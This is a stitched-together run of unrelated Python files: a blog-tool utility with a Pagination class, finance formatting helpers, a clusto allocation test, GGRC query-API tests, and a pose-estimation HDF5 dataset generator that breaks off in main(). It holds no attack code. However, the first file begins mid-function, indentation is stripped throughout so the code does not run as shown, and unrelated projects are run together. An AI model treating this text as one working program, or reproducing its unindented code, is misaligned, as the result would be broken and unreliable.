from catsup.options import g
kwargs.setdefault("cwd", g.cwdpath)
if silence:
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("shell", True)
return subprocess.call(cmd, **kwargs)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def smart_copy(source, target):
if not os.path.exists(source):
return
def copy_file(source, target):
if os.path.exists(target):
if os.path.getsize(source) == os.path.getsize(target):
return
mkdir(os.path.dirname(target))
open(target, "wb").write(open(source, "rb").read())
if os.path.isfile(source):
return copy_file(source, target)
for f in os.listdir(source):
sourcefile = os.path.join(source, f)
targetfile = os.path.join(target, f)
if os.path.isfile(sourcefile):
copy_file(sourcefile, targetfile)
else:
smart_copy(sourcefile, targetfile)
class Pagination(object):
def __init__(self, page, posts, per_page, get_permalink):
self.total_items = posts
self.page = page
self.per_page = per_page
self.get_permalink = get_permalink
def iter_pages(self, edge=4):
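# Return a window of page numbers at most 2 * edge + 1 wide, centered on the
# current page and clamped to the valid range [1, pages].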
if self.page <= edge:
return range(1, min(self.pages, 2 * edge + 1) + 1)
if self.page + edge > self.pages:
return range(max(self.pages - 2 * edge, 1), self.pages + 1)
return range(self.page - edge, min(self.pages, self.page + edge) + 1)
@property
def pages(self):
return int((self.total - 1) / self.per_page) + 1
@property
def has_prev(self):
return self.page > 1
@property
def prev_permalink(self):
return self.get_permalink(self.prev_num)
@property
def prev_num(self):
return self.page - 1
@property
def has_next(self):
return self.page < self.pages
@property
def next_permalink(self):
return self.get_permalink(self.next_num)
@property
def next_num(self):
return self.page + 1
@property
def total(self):
return len(self.total_items)
@property
def items(self):
start = (self.page - 1) * self.per_page
end = self.page * self.per_page
return self.total_items[start:end]
|
"""
util.py
General constants and functions that will be used throughout the package.
"""
import numpy as np
import pandas as pd
# Constants
# ------------------------------------------------------------------------------------------------------------------------------
# Display constants
COL_DASH_WIDTH = 128
# Time constants
DEFAULT_INITIAL_PRICE = 100.0
DAYS_IN_YEAR = 365.25
DAYS_IN_TRADING_YEAR = 252.0
MONTHS_IN_YEAR = 12.0
# Percent Constants
RISK_FREE_RATE = 0.01
# Trading Signal Constants
FIBONACCI_DECIMAL = np.array([0, 0.236, 0.382, 0.5, 0.618, 1])
FIBONACCI_SEQUENCE = [0, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233]
RANK_DAYS_IN_TRADING_YEAR = [200, 125, 50, 20, 3, 14]
RANK_PERCENTS = [0.3, 0.3, 0.15, 0.15, 0.5, 0.5]
# Number Formater Functions
# ------------------------------------------------------------------------------------------------------------------------------
def fmtp(x):
"""
Format as percent.
"""
return '-' if np.isnan(x) else format(x, '.2%')
def fmtpn(x):
"""
Format as percent without the sign.
"""
return '-' if np.isnan(x) else format(100.0 * x, '.2f')
def fmtn(x):
"""
Format as float.
"""
return '-' if np.isnan(x) else format(x, '.2f')
def fmttn(x):
"""
Format as text notation float (Thousand, Million, Billion, etc.).
"""
abs_x = abs(x)
if np.isnan(x):
return '-'
elif abs_x < 1e3:
return '{:0.2f}'.format(x)
elif 1e3 <= abs_x < 1e6:
return '{:0.2f} k'.format(x / 1e3)
elif 1e6 <= abs_x < 1e9:
return '{:0.2f} M'.format(x / 1e6)
elif 1e9 <= abs_x < 1e12:
return '{:0.2f} B'.format(x / 1e9)
elif abs_x >= 1e12:
return '{:0.2f} T'.format(x / 1e12)
# Number Parser Functions
# ------------------------------------------------------------------------------------------------------------------------------
def prsp(x):
"""
Parse string as percent.
"""
return np.nan if x == '-' else float(x.replace('%', '')) / 100.0
def prspn(x):
"""
Parse string as percent without sign.
"""
return np.nan if x == '-' else float(x) / 100.0
def prsn(x):
"""
Parse string as float.
"""
return np.nan if x == '-' else float(x)
def prstn(x):
"""
Parse text notation string
"""
try:
if x.strip().endswith('T'):
return float(x[:-1]) * 1e12
elif x.strip().endswith('B'):
return float(x[:-1]) * 1e9
elif x.strip().endswith('M'):
return float(x[:-1]) * 1e6
elif x.strip().lower().endswith('k'):
return float(x[:-1]) * 1e3
else:
return float(x)
except ValueError:
return np.nan
# General Price Helper Functions
# ------------------------------------------------------------------------------------------------------------------------------
def sma(x, n=20):
"""
Return simple moving average pandas data, x, over interval, n.
"""
return pd.rolling_mean(x, n)
def ema(x, n=20):
"""
Return exponential moving average pandas data, x, over interval, n.
"""
return pd.ewma(x, n)
def calc_returns(x):
"""
Calculate arithmetic returns of price series.
"""
return x / x.shift(1) - 1.0
def calc_log_returns(x):
"""
Calculate log returns of price series.
"""
return np.log(x / x.shift(1))
def calc_price(x, x0=DEFAULT_INITIAL_PRICE):
"""
Calculate price from returns series.
"""
return (x.replace(to_replace=np.nan, value=0) + 1.0).cumprod() * x0
def calc_cagr(x):
"""
Calculate compound annual growth rate.
"""
start = x.index[0]
end = x.index[-1]
return np.power((x.ix[-1] / x.ix[0]), 1.0 / ((end - start).days / DAYS_IN_YEAR)) - 1.0
def rebase_price(x, x0=DEFAULT_INITIAL_PRICE):
"""
Convert a series to another initial price.
"""
return x0 * x / x.ix[0]
# General Number Helper Functions
# ------------------------------------------------------------------------------------------------------------------------------
def scale(x, (xmin, xmax), (ymin, ymax)):
"""
Scale a number from one range to another range, clipping values that are out of bounds.
"""
# Ensure everything is a float
x = float(x)
xmin = float(xmin)
xmax = float(xmax)
ymin = float(ymin)
ymax = float(ymax)
# Scale input while handling bounds
if x < xmin:
return ymin
elif x > xmax:
return ymax
else:
return ((ymax - ymin) * (x - xmin) / (xmax - xmin)) + ymin
|
import clusto
from clusto.test import testbase
from clusto.drivers import *
from clusto.drivers.resourcemanagers.simplenummanager import *
class SimpleNumManagerTests(testbase.ClustoTestBase):
def data(self):
n1 = SimpleNumManager('numgen1', next=1)
n2 = SimpleNumManager('numgen2', maxnum=4, next=0)
clusto.flush()
def testAllocateNum(self):
ngen = clusto.get_by_name('numgen1')
d = Driver('foo')
s1 = ngen.allocate(d)
s2 = ngen.allocate(d)
s3 = ngen.allocate(d)
s4 = ngen.allocate(d)
self.assertEqual(ngen.owners(1), [d])
self.assertEqual(ngen.owners(2), [d])
self.assertEqual(ngen.owners(3), [d])
self.assertEqual(ngen.owners(4), [d])
def testAllocateMaxNum(self):
d = Driver('foo')
ngen = clusto.get_by_name('numgen2')
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
s1 = ngen.allocate(d)
self.assertRaises(SimpleNumManagerException, ngen.allocate, d)
|
# coding: utf-8
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests for /query api endpoint."""
from datetime import datetime
from operator import itemgetter
from flask import json
from nose.plugins.skip import SkipTest
from ggrc import db
from ggrc.models import CustomAttributeDefinition as CAD
from integration.ggrc.converters import TestCase
from integration.ggrc.models import factories
# to be moved into converters.query_helper
DATE_FORMAT_REQUEST = "%m/%d/%Y"
DATE_FORMAT_RESPONSE = "%Y-%m-%d"
# pylint: disable=super-on-old-class; false positive
class BaseQueryAPITestCase(TestCase):
"""Base class for /query api tests with utility methods."""
def setUp(self):
"""Log in before performing queries."""
# we don't call super as TestCase.setUp clears the DB
# super(BaseQueryAPITestCase, self).setUp()
self.client.get("/login")
def _post(self, data):
"""Make a POST to /query endpoint."""
if not isinstance(data, list):
data = [data]
headers = {"Content-Type": "application/json", }
return self.client.post("/query", data=json.dumps(data), headers=headers)
def _get_first_result_set(self, data, *keys):
"""Post data, get response, get values from it like in obj["a"]["b"]."""
response = self._post(data)
self.assert200(response)
result = json.loads(response.data)[0]
for key in keys:
result = result.get(key)
self.assertIsNot(result, None)
return result
@staticmethod
def _make_query_dict(object_name, type_=None, expression=None, limit=None,
order_by=None):
"""Make a dict with query for object_name with optional parameters."""
def make_filter_expression(expression):
"""Convert a three-tuple to a simple expression filter."""
left, op_name, right = expression
return {"left": left, "op": {"name": op_name}, "right": right}
query = {
"object_name": object_name,
"filters": {"expression": {}},
}
if type_:
query["type"] = type_
if expression:
query["filters"]["expression"] = make_filter_expression(expression)
if limit:
query["limit"] = limit
if order_by:
query["order_by"] = order_by
return query
# pylint: disable=too-many-public-methods
class TestAdvancedQueryAPI(BaseQueryAPITestCase):
"""Basic tests for /query api."""
@classmethod
def setUpClass(cls):
"""Set up test cases for all tests."""
TestCase.clear_data()
# This imported file could be simplified a bit to speed up testing.
cls._import_file("data_for_export_testing.csv")
def test_basic_query_eq(self):
"""Filter by = operator."""
title = "Cat ipsum 1"
programs = self._get_first_result_set(
self._make_query_dict("Program", expression=["title", "=", title]),
"Program",
)
self.assertEqual(programs["count"], 1)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertEqual(programs["values"][0]["title"], title)
def test_basic_query_in(self):
"""Filter by ~ operator."""
title_pattern = "1"
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "~", title_pattern]),
"Program",
)
self.assertEqual(programs["count"], 12)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(all(title_pattern in program["title"]
for program in programs["values"]))
def test_basic_query_ne(self):
"""Filter by != operator."""
title = "Cat ipsum 1"
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "!=", title]),
"Program",
)
self.assertEqual(programs["count"], 22)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(all(program["title"] != title
for program in programs["values"]))
def test_basic_query_not_in(self):
"""Filter by !~ operator."""
title_pattern = "1"
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "!~", title_pattern]),
"Program",
)
self.assertEqual(programs["count"], 11)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(all(title_pattern not in program["title"]
for program in programs["values"]))
def test_basic_query_lt(self):
"""Filter by < operator."""
date = datetime(2015, 5, 18)
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["effective date", "<",
date.strftime(DATE_FORMAT_REQUEST)]),
"Program",
)
self.assertEqual(programs["count"], 9)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(
all(datetime.strptime(program["start_date"],
DATE_FORMAT_RESPONSE) < date
for program in programs["values"]),
)
def test_basic_query_gt(self):
"""Filter by > operator."""
date = datetime(2015, 5, 18)
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["effective date", ">",
date.strftime(DATE_FORMAT_REQUEST)]),
"Program",
)
self.assertEqual(programs["count"], 13)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertTrue(
all(datetime.strptime(program["start_date"],
DATE_FORMAT_RESPONSE) > date
for program in programs["values"]),
)
def test_basic_query_text_search(self):
"""Filter by fulltext search."""
text_pattern = "ea"
data = self._make_query_dict("Regulation")
data["filters"]["expression"] = {
"op": {"name": "text_search"},
"text": text_pattern,
}
regulations = self._get_first_result_set(data, "Regulation")
self.assertEqual(regulations["count"], 21)
self.assertEqual(len(regulations["values"]), regulations["count"])
self.assertTrue(all((regulation["description"] and
text_pattern in regulation["description"]) or
(regulation["notes"] and
text_pattern in regulation.get("notes", ""))
for regulation in regulations["values"]))
def test_basic_query_pagination(self):
"""Test basic query with pagination info."""
from_, to_ = 1, 12
programs = self._get_first_result_set(
self._make_query_dict("Program",
expression=["title", "~", "Cat ipsum"],
order_by=[{"name": "title"}],
limit=[from_, to_]),
"Program",
)
self.assertEqual(programs["count"], to_ - from_)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertEqual(programs["total"], 23)
def test_basic_query_total(self):
"""The value of "total" doesn't depend on "limit" parameter."""
programs_no_limit = self._get_first_result_set(
self._make_query_dict("Program"),
"Program",
)
self.assertEqual(programs_no_limit["count"], programs_no_limit["total"])
from_, to_ = 3, 5
programs_limit = self._get_first_result_set(
self._make_query_dict("Program", limit=[from_, to_]),
"Program",
)
self.assertEqual(programs_limit["count"], to_ - from_)
self.assertEqual(programs_limit["total"], programs_no_limit["total"])
def test_query_limit(self):
"""The limit parameter trims the result set."""
def make_query_dict(limit=None):
"""A shortcut for making queries with different limits."""
return self._make_query_dict("Program", order_by=[{"name": "title"}],
limit=limit)
def check_counts_and_values(programs, from_, to_, count=None):
"""Make a typical assertion set for count, total and values."""
if count is None:
count = to_ - from_
self.assertEqual(programs["count"], count)
self.assertEqual(programs["total"], programs_no_limit["total"])
self.assertEqual(programs["values"],
programs_no_limit["values"][from_:to_])
programs_no_limit = self._get_first_result_set(
make_query_dict(),
"Program",
)
self.assertEqual(programs_no_limit["count"], programs_no_limit["total"])
programs_0_10 = self._get_first_result_set(
make_query_dict(limit=[0, 10]),
"Program",
)
check_counts_and_values(programs_0_10, from_=0, to_=10)
programs_10_21 = self._get_first_result_set(
make_query_dict(limit=[10, 21]),
"Program",
)
check_counts_and_values(programs_10_21, from_=10, to_=21)
programs_10_top = self._get_first_result_set(
make_query_dict(limit=[10, programs_no_limit["total"] + 42]),
"Program",
)
check_counts_and_values(programs_10_top, from_=10, to_=None,
count=programs_no_limit["total"] - 10)
# check if a valid integer string representation gets casted
programs_10_21_str = self._get_first_result_set(
make_query_dict(limit=[10, "21"]),
"Program",
)
programs_10_str_21 = self._get_first_result_set(
make_query_dict(limit=["10", 21]),
"Program",
)
self.assertDictEqual(programs_10_21_str, programs_10_21)
self.assertDictEqual(programs_10_str_21, programs_10_21)
def test_query_invalid_limit(self):
"""Invalid limit parameters are handled properly."""
# invalid "from"
self.assert400(self._post(
self._make_query_dict("Program", limit=["invalid", 12]),
))
# invalid "to"
self.assert400(self._post(
self._make_query_dict("Program", limit=[0, "invalid"]),
))
# "from" >= "to"
self.assert400(self._post(
self._make_query_dict("Program", limit=[12, 0]),
))
# negative "from"
self.assert400(self._post(
self._make_query_dict("Program", limit=[-2, 10]),
))
# negative "to"
self.assert400(self._post(
self._make_query_dict("Program", limit=[2, -10]),
))
def test_query_order_by(self):
"""Results get sorted by own field."""
# assumes unique title
def get_titles(programs):
return [program["title"] for program in programs]
programs_default = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title"}]),
"Program", "values",
)
titles_default = get_titles(programs_default)
programs_asc = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title", "desc": False}]),
"Program", "values",
)
titles_asc = get_titles(programs_asc)
programs_desc = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title", "desc": True}]),
"Program", "values",
)
titles_desc = get_titles(programs_desc)
# the titles are sorted ascending with desc=False
self.assertListEqual(titles_asc, sorted(titles_asc))
# desc=False by default
self.assertListEqual(titles_default, titles_asc)
# the titles are sorted descending with desc=True
self.assertListEqual(titles_desc, list(reversed(titles_asc)))
def test_order_by_several_fields(self):
"""Results get sorted by two fields at once."""
regulations = self._get_first_result_set(
self._make_query_dict("Regulation",
order_by=[{"name": "notes", "desc": True},
{"name": "title"}]),
"Regulation", "values",
)
regulations_unsorted = self._get_first_result_set(
self._make_query_dict("Regulation"),
"Regulation", "values",
)
self.assertListEqual(
regulations,
sorted(sorted(regulations_unsorted,
key=itemgetter("title")),
key=itemgetter("notes"),
reverse=True),
)
def test_order_by_related_titled(self):
"""Results get sorted by title of related Titled object."""
audits_title = self._get_first_result_set(
self._make_query_dict("Audit",
order_by=[{"name": "program"}, {"name": "id"}]),
"Audit", "values",
)
audits_unsorted = self._get_first_result_set(
self._make_query_dict("Audit"),
"Audit", "values",
)
# get titles from programs to check ordering
programs = self._get_first_result_set(
self._make_query_dict("Program"),
"Program", "values",
)
program_id_title = {program["id"]: program["title"]
for program in programs}
self.assertListEqual(
audits_title,
sorted(sorted(audits_unsorted, key=itemgetter("id")),
key=lambda a: program_id_title[a["program"]["id"]]),
)
def test_order_by_related_person(self):
"""Results get sorted by name or email of related Person object."""
clauses_person = self._get_first_result_set(
self._make_query_dict("Clause",
order_by=[{"name": "contact"}, {"name": "id"}]),
"Clause", "values",
)
clauses_unsorted = self._get_first_result_set(
self._make_query_dict("Clause"),
"Clause", "values",
)
# get names and emails from people to check ordering
people = self._get_first_result_set(
self._make_query_dict("Person"),
"Person", "values",
)
person_id_name = {person["id"]: (person["name"], person["email"])
for person in people}
self.assertListEqual(
clauses_person,
sorted(sorted(clauses_unsorted, key=itemgetter("id")),
key=lambda c: person_id_name[c["contact"]["id"]]),
)
def test_query_order_by_owners(self):
"""Results get sorted by name or email of the (first) owner."""
# TODO: the test data set lacks objects with several owners
policies_owner = self._get_first_result_set(
self._make_query_dict("Policy",
order_by=[{"name": "owners"}, {"name": "id"}]),
"Policy", "values",
)
policies_unsorted = self._get_first_result_set(
self._make_query_dict("Policy"),
"Policy", "values",
)
people = self._get_first_result_set(
self._make_query_dict("Person"),
"Person", "values",
)
person_id_name = {person["id"]: (person["name"], person["email"])
for person in people}
policy_id_owner = {policy["id"]: person_id_name[policy["owners"][0]["id"]]
for policy in policies_unsorted}
self.assertListEqual(
policies_owner,
sorted(sorted(policies_unsorted, key=itemgetter("id")),
key=lambda p: policy_id_owner[p["id"]]),
)
def test_query_count(self):
"""The value of "count" is same for "values" and "count" queries."""
programs_values = self._get_first_result_set(
self._make_query_dict("Program", type_="values"),
"Program",
)
programs_count = self._get_first_result_set(
self._make_query_dict("Program", type_="count"),
"Program",
)
self.assertEqual(programs_values["count"], programs_count["count"])
def test_query_ids(self):
"""The ids are the same for "values" and "ids" queries."""
programs_values = self._get_first_result_set(
self._make_query_dict("Program", type_="values"),
"Program",
)
programs_ids = self._get_first_result_set(
self._make_query_dict("Program", type_="ids"),
"Program",
)
self.assertEqual(
set(obj.get("id") for obj in programs_values["values"]),
set(programs_ids["ids"]),
)
@SkipTest
def test_self_link(self):
# It would be good if the api accepted get requests and we could add the
# query into a get parameter, then each request would also get a self link
# that could be tested to see that it truly returns what the original
# request was.
# In the end, instead of returning mapped object stubs like we do now, we'd
# just return a self link for fetching those objects.
pass
def test_multiple_queries(self):
"""Multiple queries POST is identical to multiple single-query POSTs."""
data_list = [
self._make_query_dict("Program",
order_by=[{"name": "title"}],
limit=[1, 12],
expression=["title", "~", "Cat ipsum"]),
self._make_query_dict("Program",
type_="values"),
self._make_query_dict("Program",
type_="count"),
self._make_query_dict("Program",
type_="ids"),
self._make_query_dict("Program",
type_="ids",
expression=["title", "=", "Cat ipsum 1"]),
self._make_query_dict("Program",
expression=["title", "~", "1"]),
self._make_query_dict("Program",
expression=["title", "!=", "Cat ipsum 1"]),
self._make_query_dict("Program",
expression=["title", "!~", "1"]),
self._make_query_dict("Program",
expression=["effective date", "<",
"05/18/2015"]),
self._make_query_dict("Program",
expression=["effective date", ">",
"05/18/2015"]),
{
"object_name": "Regulation",
"fields": ["description", "notes"],
"filters": {
"expression": {
"op": {"name": "text_search"},
"text": "ea",
},
},
},
]
response_multiple_posts = [json.loads(self._post(data).data)[0]
for data in data_list]
response_single_post = json.loads(self._post(data_list).data)
self.assertEqual(response_multiple_posts, response_single_post)
class TestQueryWithCA(BaseQueryAPITestCase):
"""Test query API with custom attributes."""
def setUp(self):
"""Set up test cases for all tests."""
TestCase.clear_data()
self._generate_cad()
self._import_file("sorting_with_ca_setup.csv")
self.client.get("/login")
@staticmethod
def _generate_cad():
"""Generate custom attribute definitions."""
factories.CustomAttributeDefinitionFactory(
title="CA dropdown",
definition_type="program",
multi_choice_options="one,two,three,four,five",
)
factories.CustomAttributeDefinitionFactory(
title="CA text",
definition_type="program",
)
@staticmethod
def _flatten_cav(data):
"""Unpack CAVs and put them in data as object attributes."""
cad_names = dict(db.session.query(CAD.id, CAD.title))
for entry in data:
for cav in entry.get("custom_attribute_values", []):
entry[cad_names[cav["custom_attribute_id"]]] = cav["attribute_value"]
return data
def _get_first_result_set(self, *args, **kwargs):
"""Call this method from super and flatten CAVs additionally."""
return self._flatten_cav(
super(TestQueryWithCA, self)._get_first_result_set(*args, **kwargs),
)
def test_single_ca_sorting(self):
"""Results get sorted by single custom attribute field."""
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title"}]),
"Program", "values",
)
keys = [program["title"] for program in programs]
self.assertEqual(keys, sorted(keys))
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "CA text"}]),
"Program", "values",
)
keys = [program["CA text"] for program in programs]
self.assertEqual(keys, sorted(keys))
def test_mixed_ca_sorting(self):
"""Test sorting by multiple fields with CAs."""
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "CA text"},
{"name": "title"}]),
"Program", "values",
)
keys = [(program["CA text"], program["title"]) for program in programs]
self.assertEqual(keys, sorted(keys))
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "title"},
{"name": "CA text"}]),
"Program", "values",
)
keys = [(program["title"], program["CA text"]) for program in programs]
self.assertEqual(keys, sorted(keys))
def test_multiple_ca_sorting(self):
"""Test sorting by multiple CA fields"""
programs = self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": "CA text"},
{"name": "CA dropdown"}]),
"Program", "values",
)
keys = [(prog["CA text"], prog["CA dropdown"]) for prog in programs]
self.assertEqual(keys, sorted(keys))
class TestQueryWithUnicode(BaseQueryAPITestCase):
"""Test query API with unicode values."""
def setUp(self):
"""Set up test cases for all tests."""
TestCase.clear_data()
self._generate_cad()
self._import_file("querying_with_unicode.csv")
self.client.get("/login")
@staticmethod
def _generate_cad():
"""Generate custom attribute definitions."""
factories.CustomAttributeDefinitionFactory(
title=u"CA список",
definition_type="program",
multi_choice_options=u"один,два,три,четыре,пять",
)
factories.CustomAttributeDefinitionFactory(
title=u"CA текст",
definition_type="program",
)
@staticmethod
def _flatten_cav(data):
"""Unpack CAVs and put them in data as object attributes."""
cad_names = dict(db.session.query(CAD.id, CAD.title))
for entry in data:
for cav in entry.get("custom_attribute_values", []):
entry[cad_names[cav["custom_attribute_id"]]] = cav["attribute_value"]
return data
def test_query(self):
"""Test query by unicode value."""
title = u"программа A"
programs = self._get_first_result_set(
self._make_query_dict("Program", expression=["title", "=", title]),
"Program",
)
self.assertEqual(programs["count"], 1)
self.assertEqual(len(programs["values"]), programs["count"])
self.assertEqual(programs["values"][0]["title"], title)
def test_sorting_by_ca(self):
"""Test sorting by CA fields with unicode names."""
programs = self._flatten_cav(
self._get_first_result_set(
self._make_query_dict("Program",
order_by=[{"name": u"CA текст"},
{"name": u"CA список"}]),
"Program", "values",
)
)
keys = [(prog[u"CA текст"], prog[u"CA список"]) for prog in programs]
self.assertEqual(keys, sorted(keys))
|
import numpy as np
import h5py
import getopt, sys, time
import img
import draw
import ref
import segment
def gendefault(annot, idx, img_in, chg=None):
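# Build one sample: a cropped (optionally flipped/scaled/rotated/translated)
# RGB input of shape (3,) + ref.in_res and per-part Gaussian heatmaps of shape
# (num_parts,) + ref.out_res.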
# Initialize sample parameters
c = annot['center'][idx]
s = annot['scale'][idx]
flip, r = False, 0
flip_idxs = ref.flipped_parts[annot.attrs['name']]
# Handle data augmentation
if chg is not None:
# Flipping
if 'flip' in chg:
if np.random.rand() < .5:
flip = True
# Scaling
if 'scale' in chg:
s *= min(1+chg['scale'], max(1-chg['scale'], (np.random.randn() * chg['scale']) + 1))
# Rotation
if 'rotate' in chg:
if chg['rotate'] == -1:
# Force vertical orientation
r = annot['torsoangle'][idx]
else:
r = np.random.randint(-chg['rotate'], chg['rotate'] + 1)
# Translation
if 'translate' in chg:
for i in xrange(2):
offset = np.random.randint(-chg['translate'], chg['translate'] + 1)
c[i] += offset
# Generate input image
cropped = img.crop(img_in, c, s, ref.in_res, rot=r)
inp = np.zeros((3, ref.in_res[0], ref.in_res[1]))
for i in xrange(3):
inp[i, :, :] = cropped[:, :, i]
# Generate part heatmap output
num_parts = annot['part'].shape[1]
out = np.zeros((num_parts, ref.out_res[0], ref.out_res[1]))
for i in xrange(num_parts):
pt = annot['part'][idx,i]
if pt[0] > 0:
draw.gaussian(out[i], img.transform(pt, c, s, ref.out_res, rot=r), 2)
# Flip sample
if flip:
inp = np.array([np.fliplr(inp[i]) for i in xrange(len(inp))])
out = np.array([np.fliplr(out[flip_idxs[i]]) for i in xrange(len(out))])
return inp,out
def gendetect(annot, idx, img_in, chg=None):
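# Build a detection sample: output channel 0 is a heatmap of person centers,
# channel 1 stores each person's scale relative to the crop scale img_s around
# the corresponding center.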
img_c = [img_in.shape[1]/2, img_in.shape[0]/2]
img_s = max(img_in.shape) / 200
flip, r = False, 0
idxs = np.where(annot['index'][:] == annot['index'][idx])[0]
# Handle data augmentation
if chg is not None:
# Flipping
if 'flip' in chg:
if np.random.rand() < .5:
flip = True
# Scaling
if 'scale' in chg:
img_s *= min(1+chg['scale'], max(1-chg['scale'], (np.random.randn() * chg['scale']) + 1))
# Rotation
# if 'rotate' in chg:
# r = np.random.randint(-chg['rotate'], chg['rotate'] + 1)
# Translation
if 'translate' in chg:
for i in xrange(2):
offset = np.random.randint(-chg['translate'], chg['translate'] + 1)
img_c[i] += offset
img_c[0] += img_s * np.random.randint(-10,10)
img_c[1] += img_s * np.random.randint(-10,10)
cropped = img.crop(img_in, img_c, img_s, ref.in_res)
inp = np.zeros((3, ref.in_res[0], ref.in_res[1]))
for i in xrange(3): inp[i, :, :] = cropped[:, :, i]
out = np.zeros((2, ref.out_res[0], ref.out_res[1]))
for i in idxs:
pt = img.transform(annot['center'][i], img_c, img_s, ref.out_res)
draw.gaussian(out[0], pt, 1)
out[1,pt[1]-1:pt[1]+1,pt[0]-1:pt[0]+1] = annot['scale'][i] / img_s
if flip:
inp = np.array([np.fliplr(inp[i]) for i in xrange(len(inp))])
out = np.array([np.fliplr(out[i]) for i in xrange(len(out))])
return inp,out
def gencascade(annot, idx, img_in, chg=None, extra_args=None):
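# Build a cascade sample cropped around the two joints given in extra_args;
# zero-filled arrays are returned when either joint annotation is missing.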
jnt1 = extra_args[0]
jnt2 = extra_args[1]
pt1 = annot['part'][idx,jnt1]
pt2 = annot['part'][idx,jnt2]
if pt1.min() <= 0 or pt2.min() <= 0:
return np.zeros((3,ref.out_res[0],ref.out_res[1])), np.zeros((2,ref.out_res[0],ref.out_res[1]))
else:
return img.two_pt_crop(img_in, annot['scale'][idx], pt1, pt2, 1.8, ref.out_res, chg)
def gensample(annot, idx, chg=None, sampletype='default', extra_args=None):
img_in = ref.loadimg(annot, idx)
if sampletype == 'default':
return gendefault(annot, idx, img_in, chg)
elif sampletype == 'detect':
return gendetect(annot, idx, img_in, chg)
elif sampletype == 'cascade':
return gencascade(annot, idx, img_in, chg, extra_args)
def generateset(dataset, settype, filename, numsamples, datadir=None, chg=None, sampletype='default', idxs=None, extra_args=None):
# Generate full hdf5 dataset
# Path to output file
if datadir is None:
filepath = ref.posedir + '/data/' + dataset + '/' + filename + '.h5'
else:
filepath = datadir + '/' + dataset + '/' + filename + '.h5'
# Load in annotations
annot = ref.load(dataset, settype)
# Option to strictly follow the order of the provided annotations
# Useful for generating test sets.
if idxs is None:
numavailable = len(annot['index']) # Number of available samples
else:
numavailable = len(idxs)
inorder = False
if numsamples == -1:
numsamples = numavailable
inorder = True
print ""
print "Generating %s %s set: %s" % (dataset, sampletype, settype)
print "Path to dataset: %s" % filepath
print "Number of samples: %d" % numsamples
print "Data augmentation: %s" % (str(chg))
# Data/label sizes can be all over the place, this is the easiest way to check
ex_in, ex_out = gensample(annot, 0, chg=chg, sampletype=sampletype, extra_args=extra_args)
# Initialize numpy arrays to hold data
data = np.zeros((numsamples, ex_in.shape[0], ex_in.shape[1], ex_in.shape[2]), np.float32)
label = np.zeros((numsamples, ex_out.shape[0], ex_out.shape[1], ex_out.shape[2]), np.float32)
ref_idxs = np.zeros((numsamples, 1), np.float32)
# Loop to generate new samples
print ''
print '| Progress |'
print '|',
sys.stdout.flush()
starttime = time.time()
for i in xrange(numsamples):
if idxs is not None: idx = idxs[i]
elif inorder: idx = i
else: idx = np.random.randint(numavailable)
data[i], label[i] = gensample(annot, idx, chg=chg, sampletype=sampletype, extra_args=extra_args)
ref_idxs[i] = idx
if i % max(1, numsamples / 10) == 0:  # avoid modulo-by-zero for small sets
print '=',
sys.stdout.flush()
print '|'
print ''
print 'Done!',
print '(%.2f seconds to complete.)' % (time.time() - starttime)
print ''
# Write out to hdf5 files
with h5py.File(filepath, 'w') as f:
f['data'] = data
f['label'] = label
f['index'] = ref_idxs
def helpmessage():
print "Extra flags:"
print " -d, --dataset :: Datset choice (mpii or flic), REQUIRED"
print " -o, --outfile :: Output file for data (do not include '.h5'), REQUIRED"
print " -p, --prefix :: Directory to save to (no need to include dataset name)"
print " -t, --type :: Dataset type (train or test), default is train"
print " -n, --numsamples :: Number of samples to generate, default is all available (-1) for test and 100 for train"
print ""
print "Augmentation options: (default Tompson's options for train, none for test)"
print " -m, --move :: Translate (0 - 50)"
print " -z, --zoom :: Scale (0.0 - 1.0)"
print " -r, --rotate :: Rotate (-1 for fixed vertical, 0-180 for max distortion)"
print " (Tompson's options are: -m 0 -z .5 -r 20"
print ""
print "Other dataset types:"
print " -q, --detect"
print " -c, --cascade :: Provide first joint as argument, must use additional argument below"
print " -j, --pairedjoint :: Provide second joint to be used with 'cascade'"
print ""
print "Additional limb heatmap output:"
print " -s, --segment :: - 0 No limb segment output (default)"
print " - 1 Does not distinguish parts, angle == angle + 180"
print " - 2 Distinguishes different part types, angle == angle + 180"
print " - 3 Distinguishes different part types, angle != angle + 180"
sys.exit(2)
def main(argv):
# Default values
dataset = None
datadir = None
outfile = None
numsamples = 100
settype = 'train'
chg = None
sampletype = 'default'
jnt1 = -1
jnt2 = -1
extra = None
# Process command line arguments
try:
opts, args = getopt.getopt(argv, "hd:o:p:t:n:m:z:r:s:qc:j:", ["help", "dataset=", "outfile=", "prefix=", "type=",
"numsamples=", "move=", "zoom=", "rotate=",
"segment=", "detect", "cascade=", "pairedjoint="])
except getopt.GetoptError:
print "Incorrect arguments"
helpmessage()
sys.exit()
for opt,arg in opts:
# Help
if opt in ('-h','--help'):
helpmessage()
# Dataset choice
